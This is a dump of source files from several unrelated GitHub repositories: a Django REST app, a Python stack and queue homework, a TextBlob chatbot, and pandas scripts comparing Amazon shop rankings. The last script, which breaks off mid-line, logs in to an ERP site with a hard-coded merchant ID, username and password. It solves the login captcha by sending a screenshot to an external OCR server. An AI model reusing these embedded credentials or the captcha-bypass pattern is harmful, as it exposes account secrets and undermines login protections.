"path": "/general/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom rest_framework import viewsets\nfrom general.serializers import UserSerializer#, ProfileSerializer\n#from .models import Profile\n# Create your views here.\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n#class ProfileViewSet(viewsets.ModelViewSet):\n\t#queryset = Profile.objects.all()\n\t#serializer_class = ProfileSerializer"
},
{
"alpha_fraction": 0.7773584723472595,
"alphanum_fraction": 0.7773584723472595,
"avg_line_length": 25.200000762939453,
"blob_id": "64532cff47ac45bb34d2d230e12a321df84c8b7a",
"content_id": "592e4d064be75e2d4499cda0f501ae88429bc9ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 10,
"path": "/comments/serializers.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from .models import Comments\nfrom rest_framework import serializers\n\nfrom general.serializers import UserSerializer\n\nclass CommentsSerializer(serializers.HyperlinkedModelSerializer):\n\n\tclass Meta:\n\t\tmodel = Comments\n\t\tfields = ('id', 'user', 'title', 'comment')\n\t "
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7765957713127136,
"avg_line_length": 30.44444465637207,
"blob_id": "00e82dbdabbe2320b9919cd972adf6b51bd56685",
"content_id": "a0da2e76ea237ddc71b1bf089d6b7f3c6e85a422",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 9,
"path": "/comments/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Comments(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\n\n\ttitle = models.CharField(max_length=250)\n\tcomment = models.TextField()"
},
{
"alpha_fraction": 0.8175895810127258,
"alphanum_fraction": 0.8175895810127258,
"avg_line_length": 29.799999237060547,
"blob_id": "62d69703191f08860e32d08299c4b1ad00f50e36",
"content_id": "423f3bac9b5928b1bde3ac547c6c68ac1b7f9482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/comments/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Comments\nfrom rest_framework import viewsets\nfrom comments.serializers import CommentsSerializer \n\n\n# Create your views here.\nclass CommentsViewSet(viewsets.ModelViewSet):\n queryset = Comments.objects.all()\n serializer_class = CommentsSerializer"
},
{
"alpha_fraction": 0.7631027102470398,
"alphanum_fraction": 0.7631027102470398,
"avg_line_length": 25.5,
"blob_id": "51bd19b1f744e783bb726f2f8628ca82bc769d49",
"content_id": "75713549ebeb95f42930ad4bdb1bc3501f32223f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/general/serializers.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom company.models import Company\n#from .models import Profile\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\tclass Meta:\n\t model = User\n\t fields = ('url', 'username', 'email', 'is_staff')\n\n\n#class ProfileSerializer(serializers.HyperlinkedModelSerializer):\n\t#company = serializers.StringRelatedField(many=True)\n\n\t#class Meta:\n\t\t#model = Profile\n\t\t#fields = ('company')\n"
},
{
"alpha_fraction": 0.8166666626930237,
"alphanum_fraction": 0.8166666626930237,
"avg_line_length": 32.44444274902344,
"blob_id": "9ebe7cab5b5275db2d3197366fbf46c32e2b9da8",
"content_id": "32182d29c70fec6c0ee7fad79b62886fdb5ac0a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/company/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Company\nfrom rest_framework import viewsets\nfrom company.serializers import CompanySerializer \n# Create your views here.\n\nclass CompanyViewSet(viewsets.ModelViewSet):\n queryset = Company.objects.all()\n serializer_class = CompanySerializer"
},
{
"alpha_fraction": 0.7791519165039062,
"alphanum_fraction": 0.7791519165039062,
"avg_line_length": 27.350000381469727,
"blob_id": "7207451dd5dea1b6dd1601aa175c91bdb9eae377",
"content_id": "511addadc56813695e02fa646caae515b51bd8fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/general/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom company.models import Company\n\n# Create your models here.\n#class Profile(models.Model):\n\t#user = models.OneToOneField(User, on_delete=models.CASCADE)\n\t#company = models.OneToOneField(Company, on_delete=models.CASCADE)\n\n\n\n#@receiver(post_save, sender= User)\n#def create_or_update_user(sender, instance, created, **kwargs):\n\t#if created:\n\t\t#Profile.objects.create(user=instance)\n\n\t#instance.profile.save()"
}
] | 13 |
oscarlaureano/datastructuresinpython | https://github.com/oscarlaureano/datastructuresinpython | 736939acd552e46cf02b55d1205a8b7b811a5daa | 77ccb5f0121017a47fb054f9c2ac4e2bb201e6d2 | 0b20b6300d513074f4ef5328d913a06a22f9935b | refs/heads/master | 2020-04-17T15:51:52.702068 | 2019-01-20T22:33:26 | 2019-01-20T22:33:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5206215381622314,
"alphanum_fraction": 0.5319393873214722,
"avg_line_length": 24.075000762939453,
"blob_id": "3f09f84a2ae1d730a8730f601a6c22bc9f05529d",
"content_id": "0b7f240ba4dd71272f81d57fef9a8bc38f6d9996",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5227,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 200,
"path": "/Tarea1Compis.py",
"repo_name": "oscarlaureano/datastructuresinpython",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nTarea 1\r\n\r\nDesarrolla y/o documenta una implementación apropiada para las siguientes clases: STACK (lifo), \r\nQUEUE (fifo), TABLE/HASH/DICTIONARY (order),.. (* las puedes implementar “desde 0” o usar alguna \r\nlibrería “pública” *) Las clases deben contener métodos para soportar las principales operaciones \r\nde acceso y manipulación (clásicas). \r\n\"\"\"\r\n\r\n# ---------------------------------------------------------------------\r\n# ---------------------------- Stack ----------------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Implemented with a list, where the first element\r\n# is considered to be the Top of the stack\r\n\"\"\" Top\r\n\r\n 10\r\n [10, 12, 9, 1] => 12\r\n 9\r\n 1\r\n\r\n Bottom \r\n\"\"\"\r\n# Methods:\r\n# __init__ : Creates an empty stack\r\n# push : Pushes the element at the beginning of the list (Top of the stack)\r\n# pop : Returns and pops the element at the Top of the stack (None if the stack is empty)\r\n# peek: Returns the element at the Top of the stack (None if the stack is empty)\r\n# isEmpty: Returns true when stack is empty, false otherwise\r\n# print: Displays all the elements of the stack\r\n\r\n\r\nclass Stack:\r\n def __init__(self): # Init as an empty stack\r\n self.list = []\r\n\r\n def push(self, element): # Pushing the element at the beginning of the list (Top)\r\n self.list.insert(0, element)\r\n\r\n def pop(self): # Returns and pops the element at the Top of the stack\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list.pop(0)\r\n\r\n def peek(self): # Returns the element at the Top of the stack \r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list[0]\r\n\r\n def isEmpty(self): # Returns true when stack is empty, false otherwise\r\n return self.list == []\r\n \r\n def print(self): # Displays all the elements of the stack\r\n if self.isEmpty():\r\n print (\"Stack Empty\")\r\n else:\r\n for elem in self.list:\r\n print(elem)\r\n \r\n# Implementation of the stack: \r\n\r\n# Creating the stack\r\ns = Stack()\r\n\r\n# Pushing three numbers in\r\ns.push(20)\r\ns.push(6)\r\ns.push(10)\r\n\r\n# Displaying the stack\r\ns.print()\r\n\r\n# Showing the peek only\r\nprint(s.peek())\r\n\r\n# Popping the top element\r\nprint(s.pop())\r\n\r\n# Asking if the stack is empty\r\nprint(s.isEmpty())\r\n\r\n# Popping two more elements\r\nprint(s.pop())\r\nprint(s.pop())\r\n\r\n# Asking if the stack is empty\r\nprint(s.isEmpty())\r\n\r\n\r\n# ---------------------------------------------------------------------\r\n# ---------------------------- QUEUE ----------------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Implemented with a list where the first element is the front \r\n# and the last is the back\r\n\"\"\" \r\n Front [1, 40, 23, 19, 12] Back \r\n\"\"\"\r\n\r\n# Methods:\r\n# __init__ : Creates an empty stack\r\n# insert : Inserts the element at the back of the queue\r\n# remove : Removes and returns the element at the front of the queue (None if the queue is empty)\r\n# front: Returns the element at the front of the queue (None if the queue is empty)\r\n# isEmpty: Returns true when the queue is empty, false otherwise\r\n# print: Displays all the elements of the queue\r\n\r\nclass Queue:\r\n def __init__(self):\r\n self.list = []\r\n \r\n def insert(self, element):\r\n self.list.append(element)\r\n\r\n def remove(self):\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return 
self.list.pop(0)\r\n \r\n def front(self):\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list[0]\r\n\r\n def isEmpty(self): \r\n return self.list == []\r\n \r\n def print(self):\r\n if self.isEmpty():\r\n print(\"Empty Queue\")\r\n else:\r\n print(self.list)\r\n\r\n# Implementation of the queue:\r\n\r\n# Creating an empty queue\r\nq = Queue()\r\n\r\n# Inserting three elements\r\nq.insert(10)\r\nq.insert(20)\r\nq.insert(35)\r\n\r\n# Displaying the front\r\nprint(q.front())\r\n\r\n# Displaying all the elements\r\nq.print()\r\n\r\n# Asking if the queue is empty\r\nprint(q.isEmpty())\r\n\r\n# Removing one element\r\nprint(q.remove())\r\n\r\n# Displaying all the elements\r\nq.print()\r\n\r\n# Removing the rest of the elements\r\nprint(q.remove())\r\nprint(q.remove())\r\n\r\n# Asking if the queue is empty\r\nprint(q.isEmpty())\r\n\r\n\r\n# ---------------------------------------------------------------------\r\n# -------------------- TABLE/HASH/DICTIONARY -------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Using the existing dictionary in python\r\n\r\n# Creating a dictionary:\r\nphones = {'elda' : 911, 'wicho' : 92102, 'roque' : 133212}\r\n\r\n# Inserting new elements:\r\nphones['yolanda'] = 738923\r\n\r\n# Deleting elements:\r\ndel phones['roque']\r\n\r\n# Checkig if it exists:\r\n'roque' in phones\r\n'elda' in phones\r\n\r\n# Getting one number by its key:\r\nphones['elda']\r\n\r\n# Provides the list of all the keys sorted:\r\nsorted(phones)\r\n\r\n# Provides the list of all the keys in insertion order:\r\nlist(phones)"
}
] | 1 |
gormlabenz/chat-textblob | https://github.com/gormlabenz/chat-textblob | 0bc84a1f4d3f0b53cd324c7b3e3605250ed78a76 | 7407635f64a88a0b88058c41a1b9fc0656a76354 | 426f9f9018bc61c9ef3d4db878fe19dd6813857f | refs/heads/master | 2023-01-24T20:55:57.101552 | 2020-11-21T17:08:50 | 2020-11-21T17:08:50 | 314,848,162 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6579710245132446,
"alphanum_fraction": 0.6579710245132446,
"avg_line_length": 18.11111068725586,
"blob_id": "4e280bc41dba633c3b9bc77849c5234b9e0b7564",
"content_id": "4163194f97eff02a7478cef2ed7771cf2681b099",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 18,
"path": "/app/events.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from app import *\n\[email protected]\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n\[email protected]\ndef clientToServer(sid, data):\n print(\"message \", data['text'])\n response = chatbot.chat(data['text'])\n sio.emit(\"serverToClient\", response)\n print(\"response \", response)\n\n\[email protected]\ndef disconnect(sid):\n print(\"disconnect \", sid)\n\n"
},
{
"alpha_fraction": 0.4485049843788147,
"alphanum_fraction": 0.6976743936538696,
"avg_line_length": 15.722222328186035,
"blob_id": "278dcbcb1d5db1359501af6e49004b86061b9c6f",
"content_id": "c95eb08652133698e85b9ed89b41ea3531684de1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 18,
"path": "/requirements.txt",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "certifi==2020.6.20\nchardet==3.0.4\nclick==7.1.2\ndnspython==1.16.0\neventlet==0.29.1\ngreenlet==0.4.17\nidna==2.10\njoblib==0.17.0\nnltk==3.5\npython-engineio==3.13.2\npython-socketio==4.6.0\nregex==2020.11.13\nrequests==2.24.0\nsix==1.15.0\ntextblob==0.15.3\ntqdm==4.53.0\nurllib3==1.25.11\nwebsocket-client==0.57.0\n"
},
{
"alpha_fraction": 0.6147540807723999,
"alphanum_fraction": 0.6475409865379333,
"avg_line_length": 23.600000381469727,
"blob_id": "357c12bb9c19a45d1b28f04d7efe9c18b4258745",
"content_id": "eb228ed684f4cefceac6164e9e264c1b76ea723b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/run.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from app import app\nimport eventlet\n\nif __name__ == \"__main__\":\n eventlet.wsgi.server(eventlet.listen((\"\", 5000)), app)"
},
{
"alpha_fraction": 0.762135922908783,
"alphanum_fraction": 0.7815533876419067,
"avg_line_length": 24.875,
"blob_id": "6b7e1a6cd249e742e2849d9e4b929e8a762afafb",
"content_id": "df7022606f26f47961d8929cf5302c9be8fa2d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/app/__init__.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "import socketio\nfrom app.chatbot import Chatbot\n\nsio = socketio.Server(cors_allowed_origins=\"http://localhost:8080\")\napp = socketio.WSGIApp(sio)\nchatbot = Chatbot('app/intents.json')\n\nfrom app import events"
},
{
"alpha_fraction": 0.5441375970840454,
"alphanum_fraction": 0.5450429916381836,
"avg_line_length": 27.688312530517578,
"blob_id": "8f3a55b8a73878bb23bb4762c9542b73cffcf987",
"content_id": "0b05cd2b4b733e845fa02cc18d82ea80a9051049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2209,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 77,
"path": "/app/chatbot.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from textblob.classifiers import NaiveBayesClassifier\nimport json\nimport random\nfrom pathlib import Path\nimport pprint\n\n\nclass Chatbot:\n def __init__(self, intents):\n \"\"\"\n The Chatbot class. Insert a json file in a specific format. The Chatbot will be trained\n to find a pattern in a given text string and return a response.\n Define the patterns the bot should find. Then set the answers it should give\n and give them both a suitable label.\n\n The format of the json file:\n\n {\n \"intents\": [\n {\n \"label\": \"greeting\",\n \"patterns\": [\n \"Hi\",\n \"How are you\",\n ],\n \"responses\": [\n \"Hello!\",\n \"Good to see you again!\",\n ],\n }\n\n :param intents: A json file with the intents. Use the specific format.\n\n \"\"\"\n file_path = Path.cwd() / intents\n\n with open(file_path, \"r\") as file:\n self.data = json.load(file)\n\n self.classifier = self.train()\n\n def train(self):\n \"\"\"\n Train a classifier dependeding on the data\n \"\"\"\n train = []\n\n for intent in self.data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n train.append((pattern, intent[\"label\"]))\n\n pprint.pprint(train)\n cl = NaiveBayesClassifier(train)\n print('Accuracity: ', cl.accuracy(train))\n cl.show_informative_features(5) \n return cl\n\n def chat(self, input_text):\n \"\"\"\n Insert a string and get a response\n\n :param input_text: A string that the response depends on\n \"\"\"\n label = self.classifier.classify(input_text)\n return self.get_response(label)\n\n def get_response(self, label):\n \"\"\"\n Insert a label defined in the intent data and get a random response\n\n :param label: The label of tha you want a response\n \"\"\"\n intents = self.data[\"intents\"]\n responses = [\n intent[\"responses\"] for intent in intents if intent[\"label\"] == label\n ]\n return random.choice(responses[0])\n"
},
{
"alpha_fraction": 0.7208201885223389,
"alphanum_fraction": 0.7239747643470764,
"avg_line_length": 15.256410598754883,
"blob_id": "b0323de5893272b350c317095eff381bafe501e0",
"content_id": "b0df27a342e2a581438239ccd53b35352ad7c4fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/README.md",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "# Chat-Textblob\n\nA simple Chatbot with a Frontend build with VueJS and a backend build with Pathon Textblob library.\nIt uses a SocketIO connection for the realtime connection between the frontend and the backend server.\n\n## Project setup\n\n```\nnpm install\npip3 install -r requirements.txt\n```\n\n### Start the backend server\n\n```\npython3 app/app.py\n```\n\n### Compiles and hot-reloads for frontend development\n\n```\nnpm run serve\n```\n\n### Compiles and minifies for production\n\n```\nnpm run build\n```\n\n### Lints and fixes files\n\n```\nnpm run lint\n```\n\n### Customize configuration\n\nSee [Configuration Reference](https://cli.vuejs.org/config/).\n"
}
] | 6 |
ianctse/apollo | https://github.com/ianctse/apollo | 0159f9fa2374c70a8f65007291d0705b52bac72c | 4e2c60691c8cfe0d81d8667bfb9891e15f133a4e | 3ee6025b6663f147bb0225fa5485f409677b599e | refs/heads/master | 2020-04-17T13:45:14.577786 | 2019-01-20T09:07:44 | 2019-01-20T09:07:44 | 166,628,994 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7804877758026123,
"alphanum_fraction": 0.7804877758026123,
"avg_line_length": 19.5,
"blob_id": "24e1d90f25d6b8377a0375b893ab5a148f27c185",
"content_id": "483a839212a1256089674a485d822adcf6bf6b72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 41,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ianctse/apollo",
"src_encoding": "UTF-8",
"text": "# apollo\nTools for analyzing solar data.\n"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.6018518805503845,
"avg_line_length": 20.600000381469727,
"blob_id": "54b1768d96bd4bc766b9960b09c464d323baf7ed",
"content_id": "686ddf053f1749389d19bc9247a22ca3de4e930b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 10,
"path": "/setup.py",
"repo_name": "ianctse/apollo",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nsetup(name='apollo',\n version='0.1',\n author='Ian Tse',\n author_email='[email protected]',\n url='https://github.com/ianctse/apollo',\n license='MIT')\n"
}
] | 2 |
zhengquantao/DataDisplay | https://github.com/zhengquantao/DataDisplay | b7d72216442ecce4698719f7195d50bb8fe17c3d | 962d798461630c91694dc87cb967eabbf032051f | ce8dc3ef644ccf2acd319066fd143e1c2f413fd6 | refs/heads/master | 2020-11-24T23:18:43.245265 | 2019-12-27T04:21:29 | 2019-12-27T04:21:29 | 228,382,778 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5419819951057434,
"alphanum_fraction": 0.5589188933372498,
"avg_line_length": 28.221052169799805,
"blob_id": "eee686b1a9f5f1cca15a2c86cb229b4f37133719",
"content_id": "31cab60640080c38f0673c0c687ed96b3425ee50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2993,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 95,
"path": "/file.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"\\\\\"+document_name)\n data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n break\n result = pd.concat(frame)\n group_data = result.groupby(['ASIN'])\n names = name.split(\".\")[0]\n for good in group_data:\n # if i[0] == \"B07B5Y57DC\":\n # print(i[1])\n create_file(\"image/\"+names)\n plot(good[1], names, good[0])\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef plot(data: object, filename: str, name: str):\n \"\"\"\n 展示数据\n data: 数据\n datetime: 时间\n filename: 文件夹\n name: 文件名\n \"\"\"\n shop_score = data['评分'].fillna('0')\n shop_comment = data['评论数'].fillna('0')\n shop_big_ranking = data['大类排名'].fillna('0')\n shop_small_ranking = data['小类排名'].fillna('0')\n datetime = data['date'].fillna('0')\n\n fig = plt.figure(figsize=(11, 6))\n (ax1, ax2, ax3, ax4) = fig.subplots(nrows=4)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n ax1.plot(datetime, shop_score, \"red\", label=\"评分\")\n ax1.legend(title=\"评分\")\n ax1.grid(True)\n\n ax2.plot(datetime, shop_comment, \"red\", label=\"评论数\")\n ax2.legend(title=\"评论数\")\n ax2.grid(True)\n\n ax3.plot(datetime, shop_big_ranking, \"red\", label=\"大类\")\n ax3.grid(True)\n ax3.legend(title=\"大类\")\n\n ax4.plot(datetime, shop_small_ranking, \"red\", label=\"小类\")\n ax4.grid(True)\n ax4.legend(title=\"小类\")\n\n # multi = MultiCursor(fig.canvas, (ax1, ax2, ax3, ax4), color='r', lw=1, linestyle=':',\n # horizOn=False, vertOn=True)\n\n plt.xlabel(name)\n plt.savefig('./image/'+filename+'/'+name+'.png')\n plt.cla()\n plt.close()\n # plt.show()\n\n\n# find_file(\"shop\")\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
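Editorial note: file.py above walks dated subfolders, stamps each sheet with the date taken from its folder name, then concatenates before grouping by ASIN. A compact sketch of the same gather step using pathlib; the `shop/<date>/<name>.xlsx` layout is assumed from the code above, and reading Excel needs pandas plus an engine such as openpyxl:

```python
# Sketch of the gather step from file.py, rewritten with pathlib.
# Assumes the shop/<date>/<name>.xlsx layout implied by the record above.
from pathlib import Path
import pandas as pd

def gather(root: str, name: str) -> pd.DataFrame:
    frames = []
    for path in sorted(Path(root).glob('*/' + name)):
        df = pd.read_excel(path)
        df['date'] = path.parent.name  # the folder name is the snapshot date
        frames.append(df)
    if not frames:                     # avoid pd.concat([]) raising on no matches
        return pd.DataFrame()
    return pd.concat(frames, ignore_index=True)
```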
{
"alpha_fraction": 0.5184118151664734,
"alphanum_fraction": 0.5472946763038635,
"avg_line_length": 36.45189666748047,
"blob_id": "5f93e923dcebc05d9788570c27527f148a34ba8b",
"content_id": "3d9ba19ccc6f9f8e2b65211d8186883f3b0233f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13333,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 343,
"path": "/tumao_data_display/compare_xlsx.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport random\nimport numpy as np\nimport xlwt\nimport json\nimport time\nimport requests\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n# 变化范围 [评分(升,降), 评论数(升,降), 大类排名(升,降), 小类排名(升,降)]\nchange_range = [(1, 1), (10, 10), (1000, 1000), (1000, 1000)]\n\n\n# 登录\ndef login():\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-gpu')\n options.add_argument(\"disable-web-security\")\n options.add_argument('disable-infobars')\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n capa = DesiredCapabilities.CHROME\n capa[\"pageLoadStrategy\"] = \"none\"\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capa)\n wait = WebDriverWait(driver, 30)\n driver.maximize_window()\n\n login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\n driver.get(login_url)\n while True:\n # 商家号\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextCustomerID\")))\n TextCustomerID = driver.find_element_by_css_selector(\"#TextCustomerID\")\n TextCustomerID.send_keys(\"1921\")\n\n # 用户名\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextAdminName\")))\n TextAdminName = driver.find_element_by_css_selector(\"#TextAdminName\")\n TextAdminName.send_keys(\"text\")\n\n # 密码\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextPassword\")))\n TextPassword = driver.find_element_by_css_selector(\"#TextPassword\")\n TextPassword.send_keys(\"tm201606\")\n\n # 识别验证码\n time.sleep(1)\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaImage\")))\n captchaImage = driver.find_element_by_css_selector(\"#captchaImage\")\n location = captchaImage.location\n size = captchaImage.size\n left = location['x']\n top = location['y']\n right = location['x'] + size['width']\n bottom = location['y'] + size['height']\n driver.get_screenshot_as_file('a.png')\n a = Image.open(\"a.png\")\n a = a.convert('L')\n im = a.crop((left, top, right, bottom))\n im.save('a.png')\n f = open('a.png', 'rb')\n response = requests.post(url=\"http://182.61.174.27:7788/\", data=f.read())\n text = json.loads(response.text)\n print(text['code'])\n\n # 输入验证码\n txtValidate = driver.find_element_by_css_selector(\"#txtValidate\")\n txtValidate.send_keys(text['code'])\n\n # 登录按钮\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#submit\")))\n submit = driver.find_element_by_css_selector(\"#submit\")\n submit.click()\n time.sleep(2)\n\n try:\n if driver.current_url != login_url:\n cookies = driver.get_cookies()\n cookie = [item[\"name\"] + \"=\" + item[\"value\"] for item in cookies]\n cookie_str = '; '.join(item for item in cookie)\n driver.quit()\n return cookie_str\n\n except UnexpectedAlertPresentException as e:\n print(\"验证码错误\")\n driver.refresh()\n\n\ncookies = login()\n\n\ndef read_file(file: str, name: str):\n mul_file_name = os.walk(file)\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n return data\n\n\ndef compare_data(file: str, name: str):\n last_week = file[0]\n now_week = file[1]\n 
before_data = read_file(last_week, name)\n now_data = read_file(now_week, name)\n # print(before_data)\n # print(now_data)\n all_array = list()\n np_before_data = before_data.values\n np_now_data = now_data.values\n n = np.where(np_before_data == \"B07CG9BJ9H\")\n m = np.where(np_now_data == \"B07CG9BJ9H\")\n\n for now_item in np_now_data:\n for before_item in np_before_data:\n if now_item[0] == before_item[0]:\n asin_name = now_item[0]\n asin_score = now_item[1]-before_item[1]\n asin_comment = now_item[2]-before_item[2]\n asin_big_ranking = now_item[3]-before_item[3]\n asin_small_ranking = now_item[4]-before_item[4]\n all_array.append([asin_name, now_item[1], before_item[1], asin_score, '', now_item[2], before_item[2],\n asin_comment, '', now_item[3], before_item[3], asin_big_ranking, '', now_item[4],\n before_item[4], asin_small_ranking])\n break\n else:\n asin_name = now_item[0]\n asin_score = now_item[1] - 0\n asin_comment = now_item[2] - 0\n asin_big_ranking = now_item[3] - 0\n asin_small_ranking = now_item[4] - 0\n all_array.append([asin_name, now_item[1], 0, asin_score, '', now_item[2], 0,\n asin_comment, '', now_item[3], 0, asin_big_ranking, '', now_item[4],\n 0, asin_small_ranking])\n\n for before_item in np_before_data:\n for now_item in np_now_data:\n if now_item[0] == before_item[0]:\n break\n else:\n asin_name = before_item[0]\n asin_score = 0 - before_item[1]\n asin_comment = 0 - before_item[2]\n asin_big_ranking = 0 - before_item[3]\n asin_small_ranking = 0 - 